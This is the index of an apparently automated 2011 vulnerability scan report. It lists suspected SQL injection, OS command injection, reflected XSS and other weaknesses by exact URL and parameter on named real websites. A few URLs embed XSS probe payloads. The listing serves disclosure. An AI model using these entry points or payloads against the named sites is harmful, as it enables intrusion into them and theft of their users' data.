XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05152011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Sun May 15 06:37:02 CDT 2011.

1. OS command injection

1.1. http://jobsearch.naukri.com/callcenter-ites-jobs/ [_nkjs cookie]

1.2. http://jobsearch.naukri.com/information-technology-jobs/ [_nkjs cookie]

1.3. http://w28.naukri.com/advertiser/bms_logimpressions.php [banlist parameter]

2. SQL injection

2.1. http://cm.g.doubleclick.net/pixel [REST URL parameter 1]

2.2. http://jobsearch.naukri.com/information-technology-jobs/ [__utmc cookie]

2.3. http://my.naukri.com/EmploymentDetails/view [REST URL parameter 2]

2.4. http://my.naukri.com/NewProfile/listProfiles [User-Agent HTTP header]

2.5. http://search.twitter.com/search.json [Referer HTTP header]

2.6. http://w28.naukri.com/advertiser/bms_hits.php [banner parameter]

2.7. http://www.townnews.com/calendar/asset_manager/event_f229e406-7506-11e0-b056-001cc4c03286.html [REST URL parameter 3]

2.8. http://www.townnews.com/calendar/banner_ad_manager/event_0cadbf96-771e-11e0-855c-001cc4c03286.html [REST URL parameter 2]

2.9. http://www.townnews.com/calendar/business_directory_manager/event_d4277864-771e-11e0-9945-001cc4c03286.html [REST URL parameter 3]

2.10. http://www.townnews.com/calendar/search [User-Agent HTTP header]

2.11. http://www.townnews.com/content_management_solutions/blogs/article_1383ef06-772e-11e0-920f-001cc4c03286.html [name of an arbitrarily supplied request parameter]

2.12. http://www.townnews.com/content_management_solutions/blogs/article_ee26dd4e-6c25-11e0-afd7-001cc4c03286.html [REST URL parameter 1]

2.13. http://www.townnews.com/content_management_solutions/calendar/ [REST URL parameter 1]

2.14. http://www.townnews.com/favicon.ico [TNNoMobile cookie]

2.15. http://www.townnews.com/marketplace/business_434b7195-75b6-5eb4-bb91-74beeb7a6ba6.html [REST URL parameter 1]

2.16. http://www.townnews.com/search/ [l parameter]

2.17. http://www.townnews.com/topic/ [User-Agent HTTP header]

2.18. http://www.townnews.com/users/admin/calendar/event/ [REST URL parameter 4]

2.19. http://www.townnews365.com/advertising_solutions/dotconnect_media [User-Agent HTTP header]

2.20. http://www.townnews365.com/classified_solutions/employment_solutions/employment_classifieds/ [Referer HTTP header]

2.21. http://www.townnews365.com/classified_solutions/employment_solutions/the_job_network/demonstration/ [name of an arbitrarily supplied request parameter]

2.22. http://www.townnews365.com/classified_solutions/employment_solutions/top_jobs/demonstration [Referer HTTP header]

2.23. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login1.jpg [User-Agent HTTP header]

2.24. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login2.jpg [REST URL parameter 4]

2.25. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login2.jpg [REST URL parameter 8]

2.26. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login2.jpg [Referer HTTP header]

2.27. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login2.jpg [__utmc cookie]

2.28. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/usercontrib1.jpg [Referer HTTP header]

2.29. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/usercontrib2.jpg [REST URL parameter 4]

2.30. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/usercontrib2.jpg [name of an arbitrarily supplied request parameter]

2.31. http://www.townnews365.com/content/tncms/live/global/resources/images/icon-05.gif [__utmz cookie]

2.32. http://www.townnews365.com/content/tncms/live/global/resources/images/icon-05.gif [name of an arbitrarily supplied request parameter]

2.33. http://www.townnews365.com/content/tncms/live/user/user_admin-core-base/resources/images/user_70.png [REST URL parameter 3]

2.34. http://www.townnews365.com/content_management_solutions/about_blox/editorial/editorial-core-base/resources/images/user_70.png [REST URL parameter 3]

2.35. http://www.townnews365.com/content_management_solutions/murlinstats/editorial/editorial-core-base/resources/images/user_70.png [REST URL parameter 4]

2.36. http://www.townnews365.com/content_management_solutions/murlinstats/global/resources/styles/print.css [REST URL parameter 6]

2.37. http://www.townnews365.com/content_management_solutions/news/ [Referer HTTP header]

2.38. http://www.townnews365.com/content_management_solutions/news/ [name of an arbitrarily supplied request parameter]

2.39. http://www.townnews365.com/content_management_solutions/reader_commenting/ [REST URL parameter 1]

2.40. http://www.townnews365.com/content_management_solutions/reader_commenting/ [User-Agent HTTP header]

2.41. http://www.townnews365.com/content_management_solutions/topic_page/ [User-Agent HTTP header]

2.42. http://www.townnews365.com/content_solutions/ [name of an arbitrarily supplied request parameter]

2.43. http://www.townnews365.com/creatives_solutions/ [REST URL parameter 1]

2.44. http://www.townnews365.com/creatives_solutions/ad_creation/ [User-Agent HTTP header]

2.45. http://www.townnews365.com/creatives_solutions/enhanced_special_sections/demonstration/ [name of an arbitrarily supplied request parameter]

2.46. http://www.townnews365.com/distribution_solutions/ [name of an arbitrarily supplied request parameter]

2.47. http://www.townnews365.com/distribution_solutions/rss_feeds/ [TNNoMobile cookie]

2.48. http://www.townnews365.com/image_16e69036-3e95-11df-b5f4-001cc4c03286.html [REST URL parameter 1]

2.49. http://www.townnews365.com/mobile/article_1997dfba-5afa-11e0-a3fd-001cc4c03286.html [User-Agent HTTP header]

2.50. http://www.townnews365.com/search/ [f parameter]

2.51. http://www.townnews365.com/shared-content/swfobject/swfobject.js [REST URL parameter 1]

2.52. http://www.townnews365.com/shopping_solutions/yp_top_ads/ [Referer HTTP header]

2.53. http://www.townnews365.com/shopping_solutions/yp_top_ads/demonstration/ [name of an arbitrarily supplied request parameter]

2.54. http://www.townnews365.com/site/affiliates/ [Referer HTTP header]

2.55. http://www.townnews365.com/site/affiliates/ [name of an arbitrarily supplied request parameter]

2.56. http://www.townnews365.com/site/customers [REST URL parameter 1]

2.57. http://www.townnews365.com/site/customers/editorial/editorial-core-base/resources/images/user_70.png [REST URL parameter 2]

2.58. http://www.townnews365.com/site/customers/global/resources/styles/print.css [REST URL parameter 4]

2.59. http://www.townnews365.com/tncms/ads/[random_number]/center-bottom1/3/18/2d9/3182d9b8-a61e-11df-a867-001cc4c002e0-revisions/4c640596327b6.image.png [User-Agent HTTP header]

2.60. http://www.townnews365.com/tncms/ads/[random_number]/center-top1/2/8d/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif [REST URL parameter 5]

2.61. http://www.townnews365.com/tncms/ads/[random_number]/center-top1/2/8d/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif [REST URL parameter 6]

2.62. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/4/06/bd5/406bd50c-5f87-11df-a0e1-001cc4c002e0.image.gif [Referer HTTP header]

2.63. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/5/84/536/58453682-465a-11df-b231-001cc4c03286.image.gif [name of an arbitrarily supplied request parameter]

2.64. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/5/c1/f1b/5c1f1b0e-3e7d-11df-9dd9-001cc4c03286.image.gif [name of an arbitrarily supplied request parameter]

2.65. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/7/71/51c/77151cee-465a-11df-b20f-001cc4c03286.image.jpg [User-Agent HTTP header]

2.66. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/8/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif [REST URL parameter 5]

2.67. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/8/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif [User-Agent HTTP header]

2.68. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/b/9c/eb0/b9ceb062-4679-11df-8659-001cc4c03286.image.jpg [REST URL parameter 4]

2.69. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/d/7a/1e5/d7a1e5f0-fef8-11de-9e7f-001cc4c002e0.image.jpg [User-Agent HTTP header]

2.70. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/f/06/dcb/f06dcbfc-4346-11df-9060-001cc4c03286.image.gif [User-Agent HTTP header]

2.71. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/f/3a/cdc/f3acdc2e-466e-11df-873f-001cc4c03286.image.jpg [name of an arbitrarily supplied request parameter]

2.72. http://www.townnews365.com/tncms/ads/[random_number]/weather-sponsor1/2/dd/9a2/2dd9a2f2-cf0e-11de-97ca-001cc4c03286.image.gif [REST URL parameter 8]

2.73. http://www.townnews365.com/tncms/ads/[random_number]/weather-sponsor1/4/97/098/4970987c-cf0e-11de-85aa-001cc4c03286.image.gif [REST URL parameter 8]

2.74. http://www.townnews365.com/user-generated_solutions/enhanced_video/demonstration/ [name of an arbitrarily supplied request parameter]

2.75. http://www.townnews365.com/user-generated_solutions/user_account_contributions/ [__utmc cookie]

2.76. http://www.townnews365.com/users/admin/service/purchase/ [service_id parameter]

2.77. http://www.townnews365.com/users/forgot/global/resources/images/icon-03.gif [name of an arbitrarily supplied request parameter]

2.78. http://www.townnews365.com/users/forgot/global/resources/images/icon-04.gif [REST URL parameter 2]

2.79. http://www.townnews365.com/users/login/global/resources/images/icon-03.gif [REST URL parameter 4]

2.80. http://www.townnews365.com/users/login/global/resources/images/icon-04.gif [REST URL parameter 2]

2.81. http://www.townnews365.com/users/login/global/resources/images/icon-05.gif [REST URL parameter 1]

2.82. http://www.townnews365.com/users/login/global/resources/styles/print.css [Referer HTTP header]

2.83. http://www.townnews365.com/users/manage/ [Referer HTTP header]

3. LDAP injection

4. HTTP PUT enabled

5. HTTP header injection

5.1. http://ad.doubleclick.net/getcamphist [src parameter]

5.2. http://c7.zedo.com/img/bh.gif [a parameter]

6. Cross-site scripting (reflected)

6.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [adurl parameter]

6.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [ai parameter]

6.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [client parameter]

6.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [num parameter]

6.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [sig parameter]

6.6. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [sz parameter]

6.7. http://ad.doubleclick.net/adj/india.reuters.com/widgets [name of an arbitrarily supplied request parameter]

6.8. http://ad.doubleclick.net/adj/india.reuters.com/widgets [sz parameter]

6.9. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

6.10. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

6.11. http://blogs.naukri.com/ [name of an arbitrarily supplied request parameter]

6.12. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

6.13. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

6.14. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]

6.15. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]

6.16. http://hosted.newsgator.com//NGBuzz/gateway.ashx/ngdsr [_dsrId parameter]

6.17. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpck parameter]

6.18. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpck parameter]

6.19. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpck parameter]

6.20. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpvc parameter]

6.21. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpvc parameter]

6.22. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpvc parameter]

6.23. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php [xz parameter]

6.24. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php [xz parameter]

6.25. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php [xz parameter]

6.26. https://login.zoosk.com/signup.php/%22onmouseover=prompt%28980185%29%3E [REST URL parameter 2]

6.27. http://nmp.newsgator.com/NGBUZZ/buzz.ashx [_dsrId parameter]

6.28. http://nmp.newsgator.com/NGBuzz/Buzz.ashx [buzzId parameter]

6.29. http://nmp.newsgator.com/NGBuzz/Buzz.ashx [name of an arbitrarily supplied request parameter]

6.30. http://www.99labels.com/v1/brand-items.aspx [CategoryID parameter]

6.31. http://www.99labels.com/v1/brand-items.aspx [name of an arbitrarily supplied request parameter]

6.32. http://www.99labels.com/v1/brand-items.aspx [subCategoryID parameter]

6.33. http://www.addthis.com/bookmark.php [REST URL parameter 1]

6.34. http://www.addthis.com/bookmark.php [REST URL parameter 1]

6.35. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

6.36. http://www.classesandcareers.com/schooldegrees/fusion.php [name of an arbitrarily supplied request parameter]

6.37. http://www.naukri.com/tieups/tieups.php [name of an arbitrarily supplied request parameter]

6.38. http://www.policybazaar.com/Default.aspx [__CALLBACKID parameter]

6.39. http://www.quarles.com/ [name of an arbitrarily supplied request parameter]

6.40. http://www.quora.com/up/tchannel4/updates [callback parameter]

6.41. http://www.stowetoday.com/search/opensearch/generic.xml [REST URL parameter 2]

6.42. http://www.townnews.com/shared-content/e-edition/display.php [pub parameter]

6.43. http://www.townnews.com/shared-content/e-edition/display.php [pub parameter]

6.44. http://www.townnews365.com/search/opensearch/generic.xml [REST URL parameter 2]

6.45. http://www.townnews365.com/search/results/ [REST URL parameter 2]

6.46. http://www.townnews365.com/users/login/ [referer_url parameter]

6.47. http://www.townnews365.com/users/login/ [referer_url parameter]

6.48. http://www.vccircle.com/news/startups [name of an arbitrarily supplied request parameter]

6.49. http://www.zoosk.com/d/dating2/35/ [REST URL parameter 2]

6.50. http://www.zoosk.com/d/dating2/35/ [REST URL parameter 3]

6.51. http://www.addthis.com/bookmark.php [Referer HTTP header]

6.52. http://www.addthis.com/bookmark.php [Referer HTTP header]

6.53. http://www.addthis.com/bookmark.php [Referer HTTP header]

6.54. http://seg.sharethis.com/getSegment.php [__stid cookie]

7. Flash cross-domain policy

7.1. http://ad.doubleclick.net/crossdomain.xml

7.2. http://altfarm.mediaplex.com/crossdomain.xml

7.3. http://api.facebook.com/crossdomain.xml

7.4. http://at.amgdgt.com/crossdomain.xml

7.5. http://b.scorecardresearch.com/crossdomain.xml

7.6. http://bh.contextweb.com/crossdomain.xml

7.7. http://c7.zedo.com/crossdomain.xml

7.8. http://d7.zedo.com/crossdomain.xml

7.9. http://d8.zedo.com/crossdomain.xml

7.10. http://dis.criteo.com/crossdomain.xml

7.11. http://dis.us.criteo.com/crossdomain.xml

7.12. http://external.ak.fbcdn.net/crossdomain.xml

7.13. http://fls.doubleclick.net/crossdomain.xml

7.14. http://hosted.newsgator.com/crossdomain.xml

7.15. http://ib.adnxs.com/crossdomain.xml

7.16. http://idcs.interclick.com/crossdomain.xml

7.17. http://images.zwire.com/crossdomain.xml

7.18. http://img-cdn.mediaplex.com/crossdomain.xml

7.19. http://img.mediaplex.com/crossdomain.xml

7.20. http://m8.zedo.com/crossdomain.xml

7.21. http://media2.legacy.com/crossdomain.xml

7.22. http://metrics.blackberry.com/crossdomain.xml

7.23. http://nmp.newsgator.com/crossdomain.xml

7.24. http://omni.accenture.com/crossdomain.xml

7.25. http://pixel.33across.com/crossdomain.xml

7.26. http://platform.ak.fbcdn.net/crossdomain.xml

7.27. http://r1.zedo.com/crossdomain.xml

7.28. http://search.twitter.com/crossdomain.xml

7.29. http://secure-us.imrworldwide.com/crossdomain.xml

7.30. http://segment-pixel.invitemedia.com/crossdomain.xml

7.31. https://tt3.zedo.com/crossdomain.xml

7.32. http://us.blackberry.com/crossdomain.xml

7.33. http://www.blackberry.com/crossdomain.xml

7.34. http://www.vizury.com/crossdomain.xml

7.35. http://yads.zedo.com/crossdomain.xml

7.36. http://yatra.122.2o7.net/crossdomain.xml

7.37. http://ads.adsonar.com/crossdomain.xml

7.38. http://ads.bridgetrack.com/crossdomain.xml

7.39. http://api.tweetmeme.com/crossdomain.xml

7.40. http://buyonline.aegonreligare.com/crossdomain.xml

7.41. http://feeds.bbci.co.uk/crossdomain.xml

7.42. http://googleads.g.doubleclick.net/crossdomain.xml

7.43. https://googleads.g.doubleclick.net/crossdomain.xml

7.44. http://js.adsonar.com/crossdomain.xml

7.45. http://newsrss.bbc.co.uk/crossdomain.xml

7.46. http://pagead2.googlesyndication.com/crossdomain.xml

7.47. http://server.iad.liveperson.net/crossdomain.xml

7.48. http://static.ak.fbcdn.net/crossdomain.xml

7.49. http://www.adobe.com/crossdomain.xml

7.50. http://www.facebook.com/crossdomain.xml

7.51. https://www.facebook.com/crossdomain.xml

7.52. http://www.sapient.com/crossdomain.xml

7.53. http://api.twitter.com/crossdomain.xml

7.54. http://bloxcms.com/crossdomain.xml

7.55. http://services.google.com/crossdomain.xml

7.56. http://stats.wordpress.com/crossdomain.xml

7.57. https://townnews365-dot-com.bloxcms.com/crossdomain.xml

7.58. http://twitter.com/crossdomain.xml

7.59. http://www.stowetoday.com/crossdomain.xml

7.60. http://www.townnews365.com/crossdomain.xml

8. Silverlight cross-domain policy

8.1. http://ad.doubleclick.net/clientaccesspolicy.xml

8.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

8.3. http://metrics.blackberry.com/clientaccesspolicy.xml

8.4. http://omni.accenture.com/clientaccesspolicy.xml

8.5. http://pixel.33across.com/clientaccesspolicy.xml

8.6. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

8.7. http://stats.wordpress.com/clientaccesspolicy.xml

8.8. http://yatra.122.2o7.net/clientaccesspolicy.xml

9. Cleartext submission of password

9.1. http://appworld.blackberry.com/webstore/content/19736

9.2. http://appworld.blackberry.com/webstore/content/19736

9.3. http://appworld.blackberry.com/webstore/content/19736

9.4. http://documents.policybazaar.com/

9.5. http://documents.policybazaar.com/Login1.aspx

9.6. http://login.naukri.com/nLogin/Login.php

9.7. http://us.blackberry.com/apps-software/appworld/

9.8. http://www.99labels.com/v1/DeliveryPolicy.aspx

9.9. http://www.99labels.com/v1/brand-items.aspx

9.10. http://www.99labels.com/v1/index.aspx

9.11. http://www.99labels.com/v1/loginpopup.aspx

9.12. http://www.naukri.com/

9.13. http://www.quora.com/

9.14. http://www.quora.com/

9.15. http://www.townnews365.com/users/manage/

10. XML injection

10.1. http://api.facebook.com/restserver.php [format parameter]

10.2. http://cwe.mitre.org/css/main.css [REST URL parameter 1]

10.3. http://cwe.mitre.org/css/main.css [REST URL parameter 2]

10.4. http://cwe.mitre.org/css/print.css [REST URL parameter 1]

10.5. http://cwe.mitre.org/css/print.css [REST URL parameter 2]

10.6. http://cwe.mitre.org/favicon.ico [REST URL parameter 1]

10.7. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php [tem parameter]

10.8. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

10.9. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

11. SSL cookie without secure flag set

11.1. https://asia.citi.com/india/Standalone/apply-online-Suvidha-IndianOil-citibank-credit-card.htm

11.2. https://grs.tcs.com/DTOnline/CareersDesign/Jsps/EntryLevel.jsp

11.3. https://townnews365-dot-com.bloxcms.com/users/login/

11.4. https://login.naukri.com/nLogin/Login.php

11.5. https://login.zoosk.com/signup.php/%22onmouseover=prompt%28980185%29%3E

11.6. https://www.dropbox.com/referrals

11.7. https://www.facebook.com/login.php

11.8. https://www.facebook.com/recover.php

11.9. https://www.vizury.com/analyze/analyze.php

12. Session token in URL

12.1. https://adsafecontrol.com/login

12.2. http://bh.contextweb.com/bh/set.aspx

12.3. http://l.sharethis.com/pview

12.4. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

12.5. http://nmp.newsgator.com/NGBuzz/Buzz.ashx

12.6. http://static.reuters.com/resources/media/editorial/20080811/deals-widget.html

12.7. http://www.facebook.com/extern/login_status.php

12.8. http://www.google.com/realtimejs

12.9. https://www.kotakcards.com/kotak/px/kotak/applyonline.do

13. SSL certificate

13.1. https://d1gw9egox2swwv.cloudfront.net/

13.2. https://www.facebook.com/

13.3. https://adsafecontrol.com/

13.4. https://ajax.googleapis.com/

13.5. https://asia.citi.com/

13.6. https://careers.accenture.com/

13.7. https://fpdownload.macromedia.com/

13.8. https://googleads.g.doubleclick.net/

13.9. https://grs.tcs.com/

13.10. https://login.naukri.com/

13.11. https://login.zoosk.com/

13.12. https://seal.verisign.com/

13.13. https://ssl.google-analytics.com/

13.14. https://tas-cognizant.taleo.net/

13.15. https://townnews365-dot-com.bloxcms.com/

13.16. https://tt3.zedo.com/

13.17. https://www.dropbox.com/

13.18. https://www.google.com/

13.19. https://www.googleadservices.com/

13.20. https://www.kotakcards.com/

13.21. https://www.vizury.com/

14. ASP.NET ViewState without MAC enabled

14.1. http://www.99labels.com/v1/Visa-Member.aspx

14.2. http://www.policybazaar.com/Default.aspx

14.3. http://www.policybazaar.com/Personal-Loan/UploadDoc.aspx

14.4. http://www.policybazaar.com/agentregister.aspx

14.5. http://www.policybazaar.com/life-insurance/pension-insurance-india.aspx

14.6. http://www.policybazaar.com/life-insurance/term-insurance-india.aspx

14.7. http://www.policybazaar.com/tracker.aspx

14.8. http://www.policybazaar.com/travel-insurance/travel-insurance-india.aspx

14.9. http://www.policybazaar.com/utility/road-assistance-quotes.aspx

14.10. http://www.policybazaar.com/utility/road-assistance-quotes.aspx/%22ns=%22netsparker(0x00207F)

14.11. http://www.policybazaar.com/websitenews/NewsDetails.aspx

15. Open redirection

15.1. http://ad.trafficmp.com/a/bpix [r parameter]

15.2. http://metrics.blackberry.com/b/ss/rimglobal,rimbbus/1/H.22.1/s86852463499098 [vvp parameter]

15.3. http://policybazaar.com/ [name of an arbitrarily supplied request parameter]

16. Cookie scoped to parent domain

16.1. http://api.twitter.com/1/statuses/user_timeline.json

16.2. http://api.twitter.com/1/urls/resolve.json

16.3. http://us.yatra.com/livehelp/include/javascript.php

16.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.121

16.5. http://ad.trafficmp.com/a/bpix

16.6. http://ads.lfstmedia.com/mark/CRITEO_INCL_US

16.7. http://ak1.abmr.net/is/us.blackberry.com

16.8. http://at.amgdgt.com/ads/

16.9. http://b.scorecardresearch.com/b

16.10. http://bh.contextweb.com/bh/set.aspx

16.11. http://c7.zedo.com/img/bh.gif

16.12. http://careers.accenture.com/WebResource.axd

16.13. http://careers.accenture.com/in-en/landing-pages/Pages/careers-at-accenture10.aspx

16.14. http://d7.zedo.com/OzoDB/cutils/R53_5/jsc/1380/egc.js

16.15. http://d7.zedo.com/bar/v16-406/d8/jsc/gl.js

16.16. http://dis.us.criteo.com/dis/dis.aspx

16.17. http://ds.addthis.com/red/psi/p.json

16.18. http://ib.adnxs.com/getuid

16.19. http://ib.adnxs.com/pxj

16.20. http://id.google.com/verify/EAAAAOomJuk-mPSQP0rz42IBQ4Y.gif

16.21. http://idcs.interclick.com/Segment.aspx

16.22. http://login.naukri.com/nLogin/Login.php

16.23. https://login.naukri.com/nLogin/Login.php

16.24. https://login.zoosk.com/signup.php/%22onmouseover=prompt%28980185%29%3E

16.25. http://my.naukri.com/faq/faq.php

16.26. http://my.naukri.com/manager/createacc2.php

16.27. http://pixel.33across.com/ps/

16.28. http://pixel.quantserve.com/pixel

16.29. http://pixel.rubiconproject.com/tap.php

16.30. http://pixel.traveladvertising.com/Live/Pixel.aspx

16.31. http://srv.clickfuse.com/pixels/create.php

16.32. https://www.dropbox.com/referrals

16.33. http://www.facebook.com/campaign/landing.php

16.34. http://www.facebook.com/home.php

16.35. http://www.facebook.com/pages/Moline-IL/TownNewscom/98681439791

16.36. https://www.facebook.com/login.php

16.37. https://www.facebook.com/recover.php

16.38. http://www.linkedin.com/company/sapientnitro

16.39. http://www.naukri.com/

16.40. http://www.naukri.com/tieups/tieups.php

16.41. http://www.naukri.com/tieups/tieups.php

16.42. http://www.quora.com/favicon.ico

16.43. http://www.vizury.com/analyze/analyze.php

16.44. https://www.vizury.com/analyze/analyze.php

16.45. http://www.zoosk.com/d/dating2/35/

16.46. http://yads.zedo.com/ads3/a

17. Cookie without HttpOnly flag set

17.1. https://adsafecontrol.com/

17.2. https://asia.citi.com/india/Standalone/apply-online-Suvidha-IndianOil-citibank-credit-card.htm

17.3. http://brothercake.com/site/resources/scripts/onload/

17.4. https://grs.tcs.com/DTOnline/CareersDesign/Jsps/EntryLevel.jsp

17.5. https://townnews365-dot-com.bloxcms.com/users/login/

17.6. http://us.yatra.com/livehelp/include/javascript.php

17.7. http://www.classesandcareers.com/schooldegrees/fusion.php

17.8. https://www.kotakcards.com/kotak/px/kotak/applyonline.do

17.9. http://www.linkedin.com/company/sapientnitro

17.10. http://www.townnews365.com/users/login-success/

17.11. http://ad.doubleclick.net/adi/N3285.google/B2343920.121

17.12. http://ad.trafficmp.com/a/bpix

17.13. http://ad.yieldmanager.com/pixel

17.14. http://ads.bridgetrack.com/track/

17.15. http://ads.lfstmedia.com/mark/CRITEO_INCL_US

17.16. http://adserv.vccircle.com/www/delivery/afr.php

17.17. http://adserv.vccircle.com/www/delivery/ajs.php

17.18. http://adserv.vccircle.com/www/delivery/lg.php

17.19. http://ak1.abmr.net/is/us.blackberry.com

17.20. http://ask.policybazaar.com/

17.21. http://at.amgdgt.com/ads/

17.22. http://b.scorecardresearch.com/b

17.23. http://bh.contextweb.com/bh/set.aspx

17.24. http://c7.zedo.com/img/bh.gif

17.25. http://careers.accenture.com/WebResource.axd

17.26. http://careers.accenture.com/in-en/landing-pages/Pages/careers-at-accenture10.aspx

17.27. http://d7.zedo.com/OzoDB/cutils/R53_5/jsc/1380/egc.js

17.28. http://d7.zedo.com/bar/v16-406/d8/jsc/gl.js

17.29. http://dis.us.criteo.com/dis/dis.aspx

17.30. http://ds.addthis.com/red/psi/p.json

17.31. http://idcs.interclick.com/Segment.aspx

17.32. https://login.zoosk.com/signup.php/%22onmouseover=prompt%28980185%29%3E

17.33. http://my.naukri.com/PayCheck/salary

17.34. http://my.naukri.com/faq/faq.php

17.35. http://my.naukri.com/jobTools/web/tools.php/PayCheck/salary

17.36. http://my.naukri.com/manager/createacc2.php

17.37. http://pixel.33across.com/ps/

17.38. http://pixel.quantserve.com/pixel

17.39. http://pixel.rubiconproject.com/tap.php

17.40. http://pixel.traveladvertising.com/Live/Pixel.aspx

17.41. http://srv.clickfuse.com/pixels/create.php

17.42. http://twitter.com/share

17.43. http://www.99labels.com/ScriptResource.axd

17.44. http://www.99labels.com/WebResource.axd

17.45. http://www.99labels.com/v1/ScriptCombiner.axd

17.46. http://www.99labels.com/v1/alertbox/jquery.alerts.css

17.47. http://www.99labels.com/v1/alertbox/jquery.alerts.js

17.48. http://www.99labels.com/v1/css/1366layout.css

17.49. http://www.99labels.com/v1/css/cascade.css

17.50. http://www.99labels.com/v1/css/layout.css

17.51. http://www.99labels.com/v1/jquery/jquery-1.4.2.min.js

17.52. http://www.99labels.com/v1/jquery/jquery-ui-1.8.4.custom.min.js

17.53. http://www.99labels.com/v1/thickbox/thickbox.css

17.54. http://www.facebook.com/home.php

17.55. https://www.facebook.com/login.php

17.56. https://www.facebook.com/recover.php

17.57. http://www.naukri.com/

17.58. http://www.naukri.com/tieups/tieups.php

17.59. http://www.naukri.com/tieups/tieups.php

17.60. http://www.quarles.com/

17.61. http://www.vizury.com/analyze/analyze.php

17.62. https://www.vizury.com/analyze/analyze.php

17.63. http://www.yatra.com/connect/www/content/afr.php

17.64. http://www.yatra.com/connect/www/content/ajs.php

17.65. http://www.yatra.com/connect/www/content/avw.php

17.66. http://www.yatra.com/connect/www/content/avw.php

17.67. http://www.yatra.com/connect/www/content/avw.php

17.68. http://www.yatra.com/connect/www/content/avw.php

17.69. http://www.yatra.com/connect/www/content/avw.php

17.70. http://www.yatra.com/connect/www/content/ck.php

17.71. http://www.yatra.com/connect/www/content/lg.php

17.72. http://www.yatra.com/livehelp/include/status.php

17.73. http://www.zoosk.com/d/dating2/35/

17.74. http://yads.zedo.com/ads3/a

18. Password field with autocomplete enabled

18.1. https://adsafecontrol.com/login

18.2. http://appworld.blackberry.com/webstore/content/19736

18.3. http://appworld.blackberry.com/webstore/content/19736

18.4. http://appworld.blackberry.com/webstore/content/19736

18.5. http://documents.policybazaar.com/

18.6. http://documents.policybazaar.com/Login1.aspx

18.7. http://login.naukri.com/nLogin/Login.php

18.8. https://login.naukri.com/nLogin/Login.php

18.9. https://login.naukri.com/nLogin/Login.php

18.10. https://login.zoosk.com/login.php

18.11. https://login.zoosk.com/signup.php

18.12. https://login.zoosk.com/signup.php/%22onmouseover=prompt%28980185%29%3E

18.13. http://twitter.com/

18.14. http://twitter.com/

18.15. http://twitter.com/

18.16. http://us.blackberry.com/apps-software/appworld/

18.17. http://www.99labels.com/v1/DeliveryPolicy.aspx

18.18. http://www.99labels.com/v1/brand-items.aspx

18.19. http://www.99labels.com/v1/index.aspx

18.20. http://www.99labels.com/v1/loginpopup.aspx

18.21. http://www.99labels.com/v1/loginpopup.aspx

18.22. https://www.dropbox.com/

18.23. https://www.dropbox.com/anywhere

18.24. https://www.dropbox.com/apps

18.25. https://www.dropbox.com/apps/64/documents-to-go

18.26. https://www.dropbox.com/contact

18.27. https://www.dropbox.com/help

18.28. https://www.dropbox.com/register

18.29. https://www.dropbox.com/register

18.30. https://www.dropbox.com/team/contact

18.31. http://www.facebook.com/register/fbconnect.php

18.32. http://www.facebook.com/zooskdating

18.33. https://www.facebook.com/login.php

18.34. https://www.facebook.com/recover.php

18.35. http://www.naukri.com/

18.36. http://www.quora.com/

18.37. http://www.quora.com/

18.38. http://www.townnews365.com/users/login/

